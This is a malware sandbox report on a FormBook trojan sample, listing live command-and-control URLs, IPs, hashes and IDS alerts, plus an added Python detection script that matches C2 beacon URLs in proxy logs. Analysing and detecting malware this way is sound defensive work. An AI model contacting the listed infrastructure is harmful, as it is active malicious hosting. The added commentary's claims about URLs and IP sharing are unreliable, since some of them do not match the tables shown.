https://www.muasamgiare.click/bsye/?NVK8=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK | ieUnatt.exe, 00000008.00000002.4677795800.0000000004F36000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000003646000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.bagatowcannabis.cloud | ZaZCnGdXtY.exe, 0000000A.00000002.4679125210.00000000055B7000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.guacamask.online/sk-logabpstatus.php?a=MnJENVJwV2lhZW0rV2U4VmdEend6Tm5ucmlLSndTR0pwVHBzV3 | ieUnatt.exe, 00000008.00000002.4677795800.0000000005A34000.00000004.10000000.00040000.00000000.sdmp; ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.0000000004144000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | ieUnatt.exe, 00000008.00000003.2661002832.0000000007798000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.kkpmoneysocial.top | ZaZCnGdXtY.exe, 0000000A.00000002.4677321335.00000000037D8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.217.35 | 54248711.xyz | Canada | 35893 | ACPCA | true
154.208.202.225 | www.zoomlive.live | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
209.74.77.107 | www.happyjam.life | United States | 31744 | MULTIBAND-NEWHOPEUS | true
154.12.28.184 | www.7261ltajbc.bond | United States | 174 | COGENT-174US | true
172.67.129.38 | www.kkpmoneysocial.top | United States | 13335 | CLOUDFLARENETUS | true
84.32.84.32 | appsolucao.shop | Lithuania | 33922 | NTT-LT-ASLT | true
208.91.197.27 | www.guacamask.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
81.2.196.19 | bagatowcannabis.cloud | Czech Republic | 24806 | INTERNET-CZKtis238403KtisCZ | true
77.68.64.45 | www.dietcoffee.online | United Kingdom | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
104.21.77.71 | www.aziziyeescortg.xyz | United States | 13335 | CLOUDFLARENETUS | true
172.67.220.36 | www.supernutra01.online | United States | 13335 | CLOUDFLARENETUS | false
13.228.81.39 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
185.42.14.166 | www.artkub.net | Russian Federation | 56784 | MULTIHOST-ASRU | true
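The URL and domain tables above list the per-request C2 URLs observed in the run. Every C2 URL on this page has the same shape: a single four-character directory under the host and, when a query string is present, the parameter names NVK8 and V6T, with V6T carrying the same value on every host while the NVK8 value changes per request. The Python script below is an added example, not part of the Joe Sandbox report or of any tool it describes: it reduces a list of report URLs to the host and path pairs that survive the per-request query rotation, and then checks proxy-log lines against them. The sample URLs are copied from the tables above; the log lines, the host www.example-rotated.test and the client addresses in them are constructed for the example, and the path/parameter shape is an assumption derived only from the URLs on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Subset of URLs copied verbatim from the report's URL tables.
REPORT_URLS = [
    "http://www.123hellodrive.shop/vc3u/",
    "http://www.123hellodrive.shop/vc3u/?NVK8=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eQ2l+TkULL/wTF5DWx+rJ04uuxIumVF9zXUy61c1Y+8cRSQ==&V6T=lB24KzN0lF-8",
    "http://www.54248711.xyz/e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA==",
    "http://www.artkub.net/q5xl/",
    "http://www.guacamask.online/px.js?ch=2",
    "https://kb.fastpanel.direct/troubleshoot/",
]

# Constructed proxy-log lines (timestamp, client, method, URL); the host
# www.example-rotated.test and the 10.0.0.x clients are invented.
PROXY_LOG = [
    "2024-12-14T12:50:01Z 10.0.0.5 GET http://www.artkub.net/q5xl/?NVK8=abc==&V6T=lB24KzN0lF-8",
    "2024-12-14T12:50:03Z 10.0.0.5 GET https://www.ecosia.org/newtab/",
    "2024-12-14T12:50:09Z 10.0.0.7 GET http://www.example-rotated.test/ab12/?NVK8=zzz&V6T=lB24KzN0lF-8",
    "2024-12-14T12:50:11Z 10.0.0.7 GET http://www.guacamask.online/px.js?ch=2",
]

# Query parameter names shared by every beacon URL listed on this page
# (assumption: the shape stays stable across C2 rotations).
BEACON_KEYS = {"NVK8", "V6T"}
# Path shape of every C2 URL above: one four-character directory.
BEACON_PATH = re.compile(r"^/[a-z0-9]{4}/$")


def classify(url):
    """Return 'beacon' (4-char path plus both query keys), 'c2-path'
    (4-char path without the keys) or 'other'."""
    parts = urlsplit(url)
    if not BEACON_PATH.match(parts.path):
        return "other"
    keys = set(parse_qs(parts.query).keys())
    return "beacon" if BEACON_KEYS <= keys else "c2-path"


def extract_iocs(urls):
    """Collapse C2 URLs to sorted (host, path) pairs; the query string
    rotates per request, so it is not a usable indicator."""
    iocs = set()
    for url in urls:
        if classify(url) != "other":
            parts = urlsplit(url)
            iocs.add((parts.hostname, parts.path))
    return sorted(iocs)


def scan_proxy_log(lines, iocs):
    """Flag requests to a known C2 host+path, and requests that have the
    beacon shape on a host not yet on the list (a fresh rotation)."""
    known = set(iocs)
    hits = []
    for line in lines:
        _ts, client, _method, url = line.split(" ", 3)
        parts = urlsplit(url)
        if (parts.hostname, parts.path) in known:
            hits.append((client, parts.hostname, "known-c2"))
        elif classify(url) == "beacon":
            hits.append((client, parts.hostname, "beacon-shape"))
    return hits


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_URLS)
    for host, path in iocs:
        print(f"C2 host+path: {host}{path}")
    for client, host, reason in scan_proxy_log(PROXY_LOG, iocs):
        print(f"{client} -> {host}: {reason}")
```

Two caveats when using the tables this way: most of the C2 URLs above carry an "Avira URL Cloud: safe" verdict even though the sandbox marks them malicious, so a URL-reputation score is not a substitute for the host and path match; and the same 84.32.84.32 address serves both appsolucao.shop and 123hellodrive.shop, so blocking on IP rather than on host and path is reasonable here but will also catch unrelated tenants of shared hosting such as the Cloudflare addresses in the IP table.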
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1575104
Start date and time: 2024-12-14 13:48:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ORDER - 401.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/2@16/13
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 102
• Number of non-executed functions: 289
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.231.128.65, 20.231.128.66, 40.126.53.17, 20.190.181.6, 20.190.181.23, 40.126.53.14, 20.190.181.1, 40.126.53.18, 13.107.246.63, 23.218.208.109, 4.245.163.56, 20.12.23.50
• Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target ZaZCnGdXtY.exe, PID 3136 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
07:49:24 | API Interceptor | 1x Sleep call for process: ORDER - 401.exe modified
07:50:21 | API Interceptor | 9208594x Sleep call for process: ieUnatt.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
209.74.77.107 | ORDER-401.exe | Get hash | malicious | FormBook | Browse | www.learnwithus.site/a6qk/
209.74.77.107 | PO2412010.exe | Get hash | malicious | FormBook | Browse | www.beyondfitness.live/fbpt/
209.74.77.107 | DHL_734825510.exe | Get hash | malicious | FormBook | Browse | www.happyjam.life/4ii9/
209.74.77.107 | SRT68.exe | Get hash | malicious | FormBook | Browse | www.liveplah.live/2bf0/
209.74.77.107 | UPDATED CONTRACT.exe | Get hash | malicious | FormBook | Browse | www.gadgetre.info/8q8w/
209.74.77.107 | PO 4110007694.exe | Get hash | malicious | FormBook | Browse | www.learnwithus.site/alu5/
209.74.77.107 | Latest advice payment.exe | Get hash | malicious | FormBook | Browse | www.learnwithus.site/alu5/
209.74.77.107 | SW_5724.exe | Get hash | malicious | FormBook | Browse | www.happyjam.life/4ii9/
209.74.77.107 | quotation.exe | Get hash | malicious | FormBook | Browse | www.gadgetre.info/8q8w/
209.74.77.107 | Quotation Validity.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.beyondfitness.live/fbpt/
154.12.28.184 | Mandatory Notice for all December Leave and Vacation application.exe | Get hash | malicious | FormBook | Browse
172.67.129.38 | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | www.kkpmoneysocial.top/dlkm/
172.67.129.38 | SecuriteInfo.com.Trojan.Siggen17.15714.28660.exe | Get hash | malicious | Lokibot | Browse | 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
172.67.129.38 | SKCN_Fixture_Notes.xlsx | Get hash | malicious | Lokibot | Browse | 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
172.67.129.38 | Fixture_Note_Voy No_5.xlsx | Get hash | malicious | Lokibot | Browse | 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
172.67.129.38 | A1o6AW9jZm.exe | Get hash | malicious | Lokibot | Browse | 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
172.67.129.38 | uWyecbmxRZ.exe | Get hash | malicious | Lokibot | Browse | 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
172.67.129.38 | MT103_Swift Copy.xlsx | Get hash | malicious | Lokibot | Browse | 75bccc18b4d1631c2ecda542c872db27.ga/Ausin2/fre.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.aziziyeescortg.xyz | rPaymentAdviceNote_pdf.exe | Get hash | malicious | FormBook | Browse | 104.21.77.71
www.aziziyeescortg.xyz | SWIFT COPY 0028_pdf.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
www.guacamask.online | PO_1111101161.vbs | Get hash | malicious | FormBook | Browse | 208.91.197.27
www.guacamask.online | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse | 208.91.197.27
www.kkpmoneysocial.top | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 172.67.129.38
www.supernutra01.online | 01152-11-12-24.exe | Get hash | malicious | FormBook | Browse | 104.21.24.198
www.supernutra01.online | DRAFT COPY BL, CI & PL.exe | Get hash | malicious | FormBook | Browse | 172.67.220.36
www.supernutra01.online | PO_1111101161.vbs | Get hash | malicious | FormBook | Browse | 104.21.24.198
www.supernutra01.online | PAYMENT_ADVICE.exe | Get hash | malicious | FormBook | Browse | 104.21.24.198
www.supernutra01.online | Payment-251124.exe | Get hash | malicious | FormBook | Browse | 104.21.24.198
www.supernutra01.online | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 104.21.24.198
www.supernutra01.online | CV Lic H&S Olivetti Renzo.exe | Get hash | malicious | FormBook | Browse | 172.67.220.36
www.supernutra01.online | CV Lic H&S Olivetti Renzo.exe | Get hash | malicious | FormBook | Browse | 172.67.220.36
www.supernutra01.online | Project Breakdown Doc.exe | Get hash | malicious | FormBook | Browse | 172.67.220.36
www.supernutra01.online | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse | 172.67.220.36
dns.ladipage.com | ORDER-401.exe | Get hash | malicious | FormBook | Browse | 18.139.62.226
dns.ladipage.com | SHIPPING DOCUMENTS_PDF.exe | Get hash | malicious | FormBook | Browse | 18.139.62.226
dns.ladipage.com | CJE003889.exe | Get hash | malicious | FormBook | Browse | 13.228.81.39
dns.ladipage.com | MAERSK LINE SHIPPING DOC_4253.exe | Get hash | malicious | FormBook | Browse | 13.228.81.39
dns.ladipage.com | QUOTATON-37839993.exe | Get hash | malicious | FormBook | Browse | 13.228.81.39
dns.ladipage.com | New Purchase Order.exe | Get hash | malicious | FormBook | Browse | 54.179.173.60
dns.ladipage.com | Docs.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 18.139.62.226
dns.ladipage.com | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 13.228.81.39
dns.ladipage.com | Swift copy.exe | Get hash | malicious | FormBook | Browse | 18.139.62.226
dns.ladipage.com | wavjjT3sEq.exe | Get hash | malicious | FormBook | Browse | 54.179.173.60
www.7261ltajbc.bond | Quotation.exe | Get hash | malicious | FormBook | Browse | 154.12.28.184
www.7261ltajbc.bond | Mandatory Notice for all December Leave and Vacation application.exe | Get hash | malicious | FormBook | Browse | 154.12.28.184
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
MULTIBAND-NEWHOPEUS | SC_TR11670000_pdf.exe | Get hash | malicious | FormBook | Browse | 209.74.64.58
MULTIBAND-NEWHOPEUS | PO 1202495088.exe | Get hash | malicious | FormBook | Browse | 209.74.79.40
MULTIBAND-NEWHOPEUS | ORDER-401.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Rockwool-Msg-S9039587897.pdf | Get hash | malicious | EvilProxy, HTMLPhisher | Browse | 209.74.95.101
MULTIBAND-NEWHOPEUS | SHIPPING DOCUMENTS_PDF.exe | Get hash | malicious | FormBook | Browse | 209.74.79.42
MULTIBAND-NEWHOPEUS | Nieuwebestellingen10122024.exe | Get hash | malicious | FormBook | Browse | 209.74.64.187
MULTIBAND-NEWHOPEUS | CJE003889.exe | Get hash | malicious | FormBook | Browse | 209.74.79.40
MULTIBAND-NEWHOPEUS | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Get hash | malicious | FormBook | Browse | 209.74.79.41
MULTIBAND-NEWHOPEUS | PO2412010.exe | Get hash | malicious | FormBook | Browse | 209.74.77.107
MULTIBAND-NEWHOPEUS | Recibos.exe | Get hash | malicious | FormBook | Browse | 209.74.77.108
COGENT-174US | https://newsystem-upgrade-securitycheck.b-cdn.net/verify-human.html | Get hash | malicious | CAPTCHA Scam ClickFix | Browse | 143.244.56.49
COGENT-174US | elitebotnet.mpsl.elf | Get hash | malicious | Mirai, Okiru | Browse | 149.50.135.117
COGENT-174US | elitebotnet.m68k.elf | Get hash | malicious | Mirai, Okiru | Browse | 199.98.114.214
COGENT-174US | elitebotnet.arm7.elf | Get hash | malicious | Mirai, Okiru | Browse | 38.200.160.110
COGENT-174US | elitebotnet.arm.elf | Get hash | malicious | Mirai, Okiru | Browse | 38.78.162.234
COGENT-174US | Quotation Request-349849.exe | Get hash | malicious | FormBook | Browse | 206.238.89.119
COGENT-174US | RFQ.pdf.exe | Get hash | malicious | XWorm | Browse | 154.39.0.138
COGENT-174US | new1.exe | Get hash | malicious | RedLine | Browse | 38.180.72.54
COGENT-174US | kiyan.exe | Get hash | malicious | RedLine | Browse | 38.180.109.140
COGENT-174US | sparc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 149.29.31.81
COGENT-174US | ACPCAb3astmode.sh4.elf | Get hash | malicious | Mirai | Browse | 162.64.255.227
COGENT-174US | loligang.x86.elf | Get hash | malicious | Mirai | Browse | 162.54.237.100
COGENT-174US | 01152-11-12-24.exe | Get hash | malicious | FormBook | Browse | 162.0.213.94
COGENT-174US | Josho.x86.elf | Get hash | malicious | Unknown | Browse | 162.8.63.18
COGENT-174US | hax.mpsl.elf | Get hash | malicious | Mirai | Browse | 162.64.255.255
COGENT-174US | la.bot.sh4.elf | Get hash | malicious | Mirai | Browse | 162.49.96.105
COGENT-174US | UToB1WBfv0.exe | Get hash | malicious | DarkCloud | Browse | 162.55.60.2
COGENT-174US | AGrsqxaSjd.exe | Get hash | malicious | DarkCloud | Browse | 162.55.60.2
COGENT-174US | Owari.ppc.elf | Get hash | malicious | Unknown | Browse | 162.1.10.3
COGENT-174US | Owari.arm7.elf | Get hash | malicious | Mirai | Browse | 162.137.25.149
DXTL-HKDXTLTseungKwanOServiceHK | order confirmation.exe | Get hash | malicious | FormBook | Browse | 156.232.181.155
DXTL-HKDXTLTseungKwanOServiceHK | sh4.elf | Get hash | malicious | Mirai | Browse | 156.235.189.159
DXTL-HKDXTLTseungKwanOServiceHK | x86.elf | Get hash | malicious | Mirai | Browse | 156.235.242.44
DXTL-HKDXTLTseungKwanOServiceHK | nshkarm7.elf | Get hash | malicious | Mirai | Browse | 156.235.189.172
DXTL-HKDXTLTseungKwanOServiceHK | hax.x86.elf | Get hash | malicious | Mirai | Browse | 156.235.217.38
DXTL-HKDXTLTseungKwanOServiceHK | hax.mpsl.elf | Get hash | malicious | Mirai | Browse | 122.10.72.123
DXTL-HKDXTLTseungKwanOServiceHK | hax.arm.elf | Get hash | malicious | Mirai | Browse | 156.235.217.25
DXTL-HKDXTLTseungKwanOServiceHK | arm5-20241210-1051.elf | Get hash | malicious | Mirai | Browse | 156.235.189.149
DXTL-HKDXTLTseungKwanOServiceHK | arm7-20241210-1051.elf | Get hash | malicious | Mirai | Browse | 156.235.189.191
DXTL-HKDXTLTseungKwanOServiceHK | arm.elf | Get hash | malicious | Mirai | Browse | 156.235.189.161
No context
No context
Process: C:\Users\user\Desktop\ORDER - 401.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\ieUnatt.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.715959561305726
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: ORDER - 401.exe
File size: 836'608 bytes
MD5: 0b1dccaee94a61586e90e0a62ab20100
SHA1: e0af85037a69f302e5f9f7343253ad6e1c800fd5
SHA256: c614c851b9fe906089e94db09ebd858fc5e4fa04613d92cd8566b3d34297381b
SHA512: ee7668fa35ed679958aa0e1519bb18e12bdefa0ffa43328cb1c935b98998da2b793316b21922b35761106755e6e7818a898a41a2c38a15a7a48287730ee066fb
SSDEEP: 12288:PC25usx+XtxC0dI8jQ+NuECKIKY7nCKhENpCJCCwCoWoNZ6m51rtzC+J:xxadnjQECKdKhUpCQooWcxX
TLSH: 2205014532658807E6B697F00A71F17407F92EAEA922E3DA4EC56CDFB8E6F504940353
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....BMg..............0...... ........... ........@.. ....................... ............@................................
Icon Hash: 5ba4a66a2a263095
Entrypoint: 0x4cc0a2
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x674D42E9 [Mon Dec 2 05:17:29 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcc050 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xce000 | 0x1c3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xca0a8 | 0xca200 | 96eb76abe5a0384b29ce455032867670 | False | 0.8860677083333334 | data | 7.7236492887754595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xce000 | 0x1c3c | 0x1e00 | ca2e365c233ae6b032af2ac84983c84c | False | 0.8053385416666666 | data | 7.065084013421438 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd0000 | 0xc | 0x200 | e277372421e3822912d561f3a9de1af1 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xce100 | 0x164f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.951672211521625
RT_GROUP_ICON | 0xcf760 | 0x14 | data | | | 1.05
RT_VERSION | 0xcf784 | 0x2b8 | COM executable for DOS | | | 0.44971264367816094
RT_MANIFEST | 0xcfa4c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T13:50:00.870710+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-12-14T13:50:00.870710+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49801 | 154.12.28.184 | 80 | TCP
2024-12-14T13:50:18.578499+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49843 | 13.228.81.39 | 80 | TCP
2024-12-14T13:50:21.234518+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49849 | 13.228.81.39 | 80 | TCP
